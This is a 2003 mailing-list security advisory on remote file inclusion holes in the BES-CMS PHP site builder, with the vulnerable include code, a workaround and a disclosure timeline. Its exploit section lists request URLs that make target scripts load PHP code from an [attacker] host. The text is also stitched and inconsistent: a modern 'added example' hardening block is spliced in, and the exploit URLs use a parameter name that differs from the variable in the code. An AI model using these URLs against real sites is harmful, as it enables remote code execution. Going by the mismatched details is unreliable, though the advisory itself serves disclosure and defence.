[SCSA-024] BES-CMS including file vulnerability

From: Security Corporation Security Advisory (advisory_at_security-corporation.com)
Date: 12/20/03

    Date: Sat, 20 Dec 2003 22:21:03 +0100 (CET)
    To: bugtraq@securityfocus.com


    ======================================================================
    Security Corporation Security Advisory [SCSA-024]

    BES-CMS including file vulnerability
    ======================================================================

    PROGRAM: BES-CMS
    HOMEPAGE: http://bes.h6p.org
    VULNERABLE VERSIONS: 0.4 rc3, 0.5 rc3
    RISK: MEDIUM/HIGH
    IMPACT: Including of file

    RELEASE DATE: 2003-12-20

    ======================================================================
    TABLE OF CONTENTS
    ======================================================================

    1..........................................................DESCRIPTION
    2..............................................................DETAILS
    3.............................................................EXPLOITS
    4............................................................SOLUTIONS
    5...........................................................WORKAROUND
    6..................................................DISCLOSURE TIMELINE
    7..............................................................CREDITS
    8...........................................................DISCLAIMER
    9...........................................................REFERENCES
    10............................................................FEEDBACK

    1. DESCRIPTION
    ======================================================================

    "Bes-cms is a professional dynamic php website building tool. It was
    developed at mokka by a bored programmer. Bes-cms is capable of
    creating image galleries, message boards, news sections, download
    sections, contact sections and many more to be added on the
    plugin server."

    (direct quote from BES-CMS website)

    2. DETAILS
    ======================================================================

    - Including of file :

    A vulnerability has been discovered in BES-CMS that allows remote
    attackers to make the affected scripts include arbitrary PHP code
    from a location they control (leading to remote command execution).

    In : index.inc.php, Members/index.inc.php, Members/root/index.inc.php,
    we can see the following code :

    ----------------------------------------------------
    include_once($PATH__Includes."actions_default.php");
    ----------------------------------------------------

    In the Include/functions_folder.php file :
    ----------------------------------------------------
    include($PATH__Includes.'functions_folder_modules.php');

    include($PATH__Includes.'functions_folder_plugins.php');

    include($PATH__Includes.'functions_folder_files.php');
    ----------------------------------------------------

    In the Include/functions_hacking.php file :

    ----------------------------------------------------
    switch($_GET['itemID'])
    {
        case 'usershow':
            include_once("".$PATH__Includes."functions_user.php");
            Show_USer_Details($_GET['user']);
            break;
        [...]
        case 'send_bug':
            if ($UserDetails['LOGGED_IN'] == 'YES')
            {
                global $PATH__Includes;
                include_once("".$PATH__Includes."functions_error.php");
                send_bug_report();
            }
            break;
        [...]
        case 'content_view':
            global $PATH___Includes;
            include_once("".$PATH__Includes."functions_message_docTypes.php");
            Message_Centent_View($Plugin_Path);
            break;

        case 'logger':
            global $PATH__Includes;
            include_once("".$PATH__Includes."functions_users.php");
            Loggin_Message();
            break;

        case 'search':
            global $PATH__Includes;
            include_once("".$PATH__Includes."functions_general.php");
            Display_Search_Results($_POST['search_str']);
            break;
        [...]
    ----------------------------------------------------

    In the Include/functions_message.php file :

    ----------------------------------------------------
    include($PATH__Includes.'functions_message_docTypes.php');

    include($PATH__Includes.'functions_message_edit.php');
    ----------------------------------------------------

    and Include/Start.php file :

    -------------------------------------------
    include_once($inc_path."Include/vars.php");
    -------------------------------------------

    All these files are vulnerable. In every case the include path starts
    with a variable that is never initialised anywhere in the code
    ($inc_path or $PATH__Includes), so with register_globals enabled an
    attacker can define it through the request.

    3. EXPLOITS
    ======================================================================

    - Including of file : (if register_globals=ON):

    - http://[target]/index.inc.php?PATH_Includes=http://[attacker]/
    http://[target]/Members/index.inc.php?PATH_Includes=http://[attacker]/
    http://[target]/Members/root/index.inc.php?PATH_Includes=http://[attacker]/

    Could include the file : http://[attacker]/actions_default.php

    - http://[target]/Include/functions_folder.php?PATH_Includes=
    http://[attacker]/

    Could include the files : http://[attacker]/functions_folder_modules.php
    http://[attacker]/functions_folder_plugins.php
    http://[attacker]/functions_folder_files.php

    - http://[target]/Include/functions_hacking.php?PATH_Includes=
    http://[attacker]/&itemID=usershow

    http://[target]/Include/functions_hacking.php?PATH_Includes=
    http://[attacker]/&itemID=logger

    Could include the file : http://[attacker]/functions_user.php

    - http://[target]/Include/functions_hacking.php?PATH_Includes=
    http://[attacker]/&itemID=send_bug&UserDetails[LOGGED_IN]=YES

    Could include the file : http://[attacker]/functions_error.php

    - http://[target]/Include/functions_hacking.php?PATH_Includes=
    http://[attacker]/&itemID=content_view

    Could include the file : http://[attacker]/functions_message_docTypes.php

    - http://[target]/Include/functions_hacking.php?PATH_Includes=
    http://[attacker]/&itemID=search

    Could include the file : http://[attacker]/functions_general.php

    - http://[target]/Include/functions_message.php?PATH_Includes=
    http://[attacker]/

    Could include the files : http://[attacker]/functions_message_docTypes.php
    http://[attacker]/functions_message_edit.php

    - http://[target]/Include/Start.php?inc_path=http://[attacker]/

    Could include the file : http://[attacker]/Include/vars.php

    4. SOLUTIONS
    ======================================================================

    You can find a patch at the following link : http://www.phpsecure.info

    The author was notified and has published a fixed version (version 0.5 rc4).

    5. WORKAROUND
    ======================================================================

    In index.inc.php, Members/index.inc.php, Members/root/index.inc.php,
    Include/functions_folder.php, Include/functions_hacking.php and
    Include/functions_message.php simply add the following line as FIRST LINE :

    -------------------------------------------------------------------------
    if (isset($_REQUEST["PATH__Includes"])){ die("Patched by phpSecure.info"); }
    -------------------------------------------------------------------------

    And at the beginning of the Include/Start.php file, add the following line
    as FIRST LINE :

    ------------------------------------------------------------------------
    if (isset($_REQUEST["inc_path"])){ die("Patched by phpSecure.info"); }
    ------------------------------------------------------------------------
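    The die() workaround above only rejects requests that carry the parameter name; the root cause described in section 2 is that $PATH__Includes and $inc_path are used before they are ever assigned. The following prologue for Include/Start.php is an added example (not BES-CMS code and not the phpsecure.info patch) that fixes the defect itself: the include base is derived from the script's own location, and every include name is validated against that directory. It assumes Start.php lives in Include/ directly under the application root and uses dirname(__FILE__) so it also works on PHP 4-era installs; safe_include_path() is a hypothetical helper name.

    ```php
    <?php
    // Added example (not BES-CMS code): hardened prologue for Include/Start.php.
    // The include base comes from this file's location, never from request data,
    // so a value injected through register_globals is simply overwritten.

    // 1. Start.php is assumed to live in <app root>/Include/.
    $APP_ROOT       = realpath(dirname(__FILE__) . '/..');
    $PATH__Includes = $APP_ROOT . '/Include/';
    $inc_path       = $APP_ROOT . '/';

    // 2. Resolve an include name to an absolute path that must stay inside
    //    $base. Returns the path, or false if the name is not a plain file
    //    name (rejects "http://..." wrappers and "../" traversal) or the
    //    resolved file is missing or outside the base directory.
    function safe_include_path($base, $name)
    {
        if (!preg_match('/^[A-Za-z0-9_]+\.php$/', $name)) {
            return false;
        }
        $real_base = realpath($base);
        $full      = realpath($base . $name);
        if ($real_base === false || $full === false) {
            return false;
        }
        // Compare after symlink resolution, with a trailing separator so
        // that "Include_evil/" cannot pass as a prefix of "Include/".
        if (strpos($full, $real_base . DIRECTORY_SEPARATOR) !== 0) {
            return false;
        }
        return $full;
    }

    // 3. Includes named in the advisory, now resolved through the check.
    //    ($inc_path."Include/vars.php" from Start.php is the same file.)
    foreach (array('vars.php', 'functions_user.php') as $file) {
        $path = safe_include_path($PATH__Includes, $file);
        if ($path === false) {
            die('Refusing to include ' . htmlspecialchars($file));
        }
        include_once $path;
    }
    ```

    Disabling register_globals in php.ini remains the complementary fix, since it removes the mechanism that let request parameters become these variables in the first place.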

    6. DISCLOSURE TIMELINE
    ======================================================================

    13/12/2003 Vulnerability discovered
    14/12/2003 Vendor notified
    15/12/2003 Vendor response
    15/12/2003 Security Corporation clients notified
    15/12/2003 Started e-mail discussions
    20/12/2003 Last e-mail received
    20/12/2003 Public disclosure

    7. CREDITS
    ======================================================================

    frog-m@n <frog-man@security-corporation.com> from
    http://www.phpsecure.info is credited with this discovery

    8. DISCLAIMER
    ======================================================================

    The information within this paper may change without notice. Use of
    this information constitutes acceptance for use in an AS IS condition.
    There are NO warranties with regard to this information. In no event
    shall the author be liable for any damages whatsoever arising out of
    or in connection with the use or spread of this information. Any use
    of this information is at the user's own risk.

    9. REFERENCES
    ======================================================================

    - Original Version:
    http://www.security-corporation.com/advisories-024.html

    - French version:
    http://www.security-corporation.com/index.php?id=advisories&a=024-FR

    10. FEEDBACK
    ======================================================================

    Please send suggestions, updates, and comments to:

    Security Corporation
    http://www.security-corporation.com
    advisory@security-corporation.com

